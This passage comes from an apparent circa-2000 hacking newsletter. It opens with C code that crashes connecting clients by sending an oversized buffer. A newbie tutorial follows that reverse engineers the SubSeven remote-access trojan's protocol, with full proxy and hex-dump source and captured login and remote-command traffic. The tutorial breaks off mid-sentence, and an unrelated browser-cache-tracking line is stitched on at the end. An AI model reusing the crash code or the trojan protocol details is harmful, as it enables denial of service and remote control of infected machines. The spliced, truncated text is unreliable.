listen_sock(listensock, atoi(argv[1])); do { puts("Listening..."); sendsock = poll_for_connect(listensock); bye_bye_script_kiddie(sendsock); closesocket(sendsock); } while(!kbhit()); getch(); closesocket(listensock); return 0; } void listen_sock(int sock, int port) { struct sockaddr_in addr; int c = 0; memset((char *)&addr,'0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(port); if (bind(sock, &addr, sizeof(addr)) == -1) die("Error binding socket."); if (listen(sock, 20) == -1) die("Error listening."); } void die(char *message) { printf("Fatal error: %s\n", message); exit(1); } int poll_for_connect(int listensock) { struct sockaddr_in peer; int sendsock; int szpeer = sizeof(peer); do { sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer); } while(sendsock == -1); printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr)); return sendsock; } void bye_bye_script_kiddie(int sock) { int d = 0; char tmp[CRASHLEN]; puts("Crashing..."); do { tmp[d] = 'X'; d++; } while(d < CRASHLEN); if (send(sock, ver, strlen(ver), 0) == -1) die("Send error."); if (send(sock, cr, 2, 0) == -1) die("Send error."); if (send(sock, message, strlen(message), 0) == -1) die("Send error."); // Send our bye bye // message. if (send(sock, cr, 2, 0) == -1) die("Send error."); Sleep(1000); // Wait a second so they see the message, then.... if (send(sock, "Message; ", 9, 0) == -1) die("Send error."); // Teach them a lesson :) if (send(sock, tmp, CRASHLEN, 0) == -1) die("Send error."); if (send(sock, cr, 2, 0) == -1) die("Send error."); Sleep(3000); // Make sure all the data got sent (may need adjustment). printf("Send complete: another one bites the dust!\n\n"); } @HWA 262.0 Protocol reverse engineering using Sub7 as an example ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reverse engineering protocols by example Chopsui-cide[MmM] 2000 The Mad Midget Mafia - http://midgets.box.sk/ E-mail: chopsuicide@mail.box.sk ============================================================================= Introduction: =============== The skills tought in this text can be used for a variety of purposes such as open sourcing programs and documenting protocols. It is a newbie text, so don't expect anything too exciting. As our example, we will examine _some_ of the SubSeven protocol, and write some code to implement some of it (in C). It should be noted that this was written on and for Windows, but should be applicable to the Unix environment as well (to some degree). Examinining the protocol ========================== Throughout this tutorial, we will examine the SubSeven 2.1 Gold protocol. First, we will need to obtain a dump of some of the protocol. For this we will use the following C source: //------------------------------- *snip* ------------------------------- // dumpprot.c #include #include // This program acts like a proxy. It dumps all traffic to stdout. #define LOOP_BACK "127.0.0.1" #define LIS_PORT 2000 #define CON_PORT 27374 #define MAX_PACKET_SIZE 2048 void fatal_error(char *msg); void bnd_n_lsn(int sock, int port); int connect_sock(int sock, char *host, int port); void server_side_thread(void *param); void client_side_thread(void *param); int ss, cs, ls; // Server socket, client socket, listen socket. void main() { WSADATA data; WORD ver; WORD thid; HANDLE h; struct sockaddr_in peer; int szpeer; ver = MAKEWORD(1, 1); if (WSAStartup(ver, &data) < 0) fatal_error("Unable to initialise Winsock."); if ((ss = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); if ((cs = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); // Wait for connect from client. printf("Waiting for connection..."); bnd_n_lsn(ls, LIS_PORT); szpeer = sizeof(peer); do { cs = accept(ls, (struct sockaddr *)&peer, &szpeer); } while(cs == -1); printf("accepted from [%s].\n", inet_ntoa(peer.sin_addr)); closesocket(ls); // We won't be needing this... // Now, connect the server socket. printf("Connecting to [%s]...", LOOP_BACK); connect_sock(ss, LOOP_BACK, CON_PORT); // We can now begin relaying. printf("\nLinked: [%s]<->[%s]\n", inet_ntoa(peer.sin_addr), LOOP_BACK); // Start threads and wait for a key to be pressed. h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)client_side_thread, (LPVOID)0, 0, (LPDWORD)&thid); SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL); h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)server_side_thread, (LPVOID)0, 0, (LPDWORD)&thid); SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL); getch(); // Clean up a bit. closesocket(ss); closesocket(cs); return; // Exit } void fatal_error(char *msg) { printf("Fatal error: %s\n", msg); exit(1); } void bnd_n_lsn(int sock, int port) // Bind and list socket { struct sockaddr_in addr; int c = 0; memset((char *)&addr,'0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(port); if (bind(sock, &addr, sizeof(addr)) == -1) fatal_error("Error binding socket."); if (listen(sock, 20) == -1) fatal_error("Error listening."); } int connect_sock(int sock, char *host, int port) { struct sockaddr_in addr; struct hostent *he; memset(&addr, '0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(host); addr.sin_port = htons(port); if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length); else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host."); if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) return -1; return 0; } void server_side_thread(void *param) { char buf[MAX_PACKET_SIZE]; int r; do { memset((char *)&buf, 0, MAX_PACKET_SIZE); r = recv(ss, (char *)&buf, MAX_PACKET_SIZE, 0); if (r > 0) { printf("Server: [%s]\n", buf); send(cs, (char *)&buf, r, 0); // Forward to client socket } } while(r != -1); printf("Server socket died.\n"); exit(0); } void client_side_thread(void *param) { char buf[MAX_PACKET_SIZE]; int r; do { memset((char *)&buf, 0, MAX_PACKET_SIZE); r = recv(cs, (char *)&buf, MAX_PACKET_SIZE, 0); if (r > 0) { printf("Client: [%s]\n", buf); send(ss, (char *)&buf, r, 0); // Forward to server socket } } while(r != -1); printf("Client socket died.\n"); exit(0); } //------------------------------- *snip* ------------------------------- Configure your Sub7 server to listen to port 27374, and set the password to "hello". Run it. For gods sake make sure you are either NOT connected to any IP networks, or configure your firewall to block any traffic to port 27374 from anything but your system's loop-back address. Compile and run dumpprot.c. Connect to port 2000 with the Sub7 client. Now, do the following, and _only_ the following (your dump of the protocol should be the same as the one shown here). 1) Enter the password ("hello"). 2) Select "keys/messages". 3) Click on "msg manager". 4) Select "Warning" as the icon. 5) Select "Yes, no, cancel" as the buttons. 6) Enter "title" as the message title. 7) Enter "text" as the message text. 8) Click on "send message". 9) Respond by clicking on "yes". 10) Repeat steps 8 and 9, but this time select "no". 11) Change the icon to "error". 12) Send the message (select "yes"). 13) Change the button to "OK". 14) Send the message. 15) Exit dumpprot. Your results should look like this: [snip] Waiting for connection...accepted from [127.0.0.1]. Connecting to [127.0.0.1]... Linked: [127.0.0.1]<->[127.0.0.1] Server: [PWD] Client: [PWDhello] Server: [connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1] Client: [MW:51titleZJXXtext] Server: [user clicked : Yes.] Client: [MW:51titleZJXXtext] Server: [user clicked : No.] Client: [MW:53titleZJXXtext] Server: [user clicked : Yes.] Client: [MW:03titleZJXXtext] Server: [user clicked : Ok.] [snip] Let's break this down a little: [snip] Server: [PWD] // This is obviously the server telling the client that it can't connect until the correct password is sent. // Client: [PWDhello] // Here, the client sends back the correct password. // Server: [connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1] // The client now knows that it has connected, and the server is ready to accept commands. // // This next part will need to be looked at carefully. Pay attention to the two characters after the colon in each client request: Client: [MW:51titleZJXXtext] // "Yes, No, Cancel" button, "warning" icon. // Server: [user clicked : Yes.] // Self explanatory. This is shoved straight into the status bar at the bottom of the client window // Client: [MW:51titleZJXXtext] // "Yes, No, Cancel" button, "warning" icon. // Server: [user clicked : No.] Client: [MW:53titleZJXXtext] // "Yes, No, Cancel" button, "error" icon. The 1 has changed to the three. Let's not make assumptions yet... // Server: [user clicked : Yes.] Client: [MW:03titleZJXXtext] // "OK" button, "error" icon. The 5 has changed to 0. It's fairly safe to assume that the first character represents which button combo, and the second the icon. // Server: [user clicked : Ok.] // Surprise, surprise. // [snip] Now we'll break down the structure of all messages a bit more. Make sure you save the dump of the protocol somewhere for later (you might need it). From what we have seen thus far most of this protocol uses regular alphanumeric characters. To see if there are any terminating characters to divide messages we will need to obtain a hex dump of a few messages. Here's the modified version of dumpprot.c that will do what we want (keep the old one): //------------------------------- *snip* ------------------------------- // dumphex.c #include #include // This program acts like a proxy. It dumps all traffic to stdout. #define LOOP_BACK "127.0.0.1" #define LIS_PORT 2000 #define CON_PORT 27374 #define MAX_PACKET_SIZE 2048 void fatal_error(char *msg); void bnd_n_lsn(int sock, int port); int connect_sock(int sock, char *host, int port); void server_side_thread(void *param); void client_side_thread(void *param); int ss, cs, ls; // Server socket, client socket, listen socket. void main() { WSADATA data; WORD ver; WORD thid; HANDLE h; struct sockaddr_in peer; int szpeer; ver = MAKEWORD(1, 1); if (WSAStartup(ver, &data) < 0) fatal_error("Unable to initialise Winsock."); if ((ss = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); if ((cs = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); // Wait for connect from client. printf("Waiting for connection..."); bnd_n_lsn(ls, LIS_PORT); szpeer = sizeof(peer); do { cs = accept(ls, (struct sockaddr *)&peer, &szpeer); } while(cs == -1); printf("accepted from [%s].\n", inet_ntoa(peer.sin_addr)); closesocket(ls); // We won't be needing this... // Now, connect the server socket. printf("Connecting to [%s]...", LOOP_BACK); connect_sock(ss, LOOP_BACK, CON_PORT); // We can now begin relaying. printf("\nLinked: [%s]<->[%s]\n", inet_ntoa(peer.sin_addr), LOOP_BACK); // Start threads and wait for a key to be pressed. h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)client_side_thread, (LPVOID)0, 0, (LPDWORD)&thid); SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL); h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)server_side_thread, (LPVOID)0, 0, (LPDWORD)&thid); SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL); getch(); // Clean up a bit. closesocket(ss); closesocket(cs); return; // Exit } void fatal_error(char *msg) { printf("Fatal error: %s\n", msg); exit(1); } void bnd_n_lsn(int sock, int port) // Bind and list socket { struct sockaddr_in addr; int c = 0; memset((char *)&addr,'0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(port); if (bind(sock, &addr, sizeof(addr)) == -1) fatal_error("Error binding socket."); if (listen(sock, 20) == -1) fatal_error("Error listening."); } int connect_sock(int sock, char *host, int port) { struct sockaddr_in addr; struct hostent *he; memset(&addr, '0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(host); addr.sin_port = htons(port); if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length); else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host."); if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) return -1; return 0; } void server_side_thread(void *param) { char buf[MAX_PACKET_SIZE]; int r, c; do { memset((char *)&buf, 0, MAX_PACKET_SIZE); r = recv(ss, (char *)&buf, MAX_PACKET_SIZE, 0); if (r > 0) { c = 0; printf("Server: ["); do { printf("%x ", buf[c]); c++; } while(c < r); printf("]\n", buf); send(cs, (char *)&buf, r, 0); // Forward to server socket } } while(r != -1); printf("Server socket died.\n"); exit(0); } void client_side_thread(void *param) { char buf[MAX_PACKET_SIZE]; int r, c; do { memset((char *)&buf, 0, MAX_PACKET_SIZE); r = recv(cs, (char *)&buf, MAX_PACKET_SIZE, 0); if (r > 0) { c = 0; printf("Client: ["); do { printf("%x ", buf[c]); c++; } while(c < r); printf("]\n", buf); send(ss, (char *)&buf, r, 0); // Forward to server socket } } while(r != -1); printf("Client socket died.\n"); exit(0); } //------------------------------- *snip* ------------------------------- Recompile, run, and connect like before. This time though, don't do anything but connect (we only need a few messages). The output should look something like this: [snip] Waiting for connection...accepted from [127.0.0.1]. Connecting to [127.0.0.1]... Linked: [127.0.0.1]<->[127.0.0.1] Server: [50 57 44 ] Client: [50 57 44 68 65 6c 6c 6f ] Server: [63 6f 6e 6e 65 63 74 65 64 2e 20 32 30 3a 32 32 2e 30 34 20 2d 20 41 70 72 69 6c 20 35 2c 20 32 30 30 30 2c 20 57 65 64 6e 65 73 64 61 79 2c 20 76 65 7 2 73 69 6f 6e 3a 20 47 4f 4c 44 20 32 2e 31 ] [snip] It looks as though there are no terminating characters, so the messages must be differentiated by what packets they arrive in. Let's take a look at that the message box message again: MW:51titleZJXXtext The format is probably: MW:

Your browser's cache has just been tagged and tracked by meantime. You have visited this resource %d times using this tag.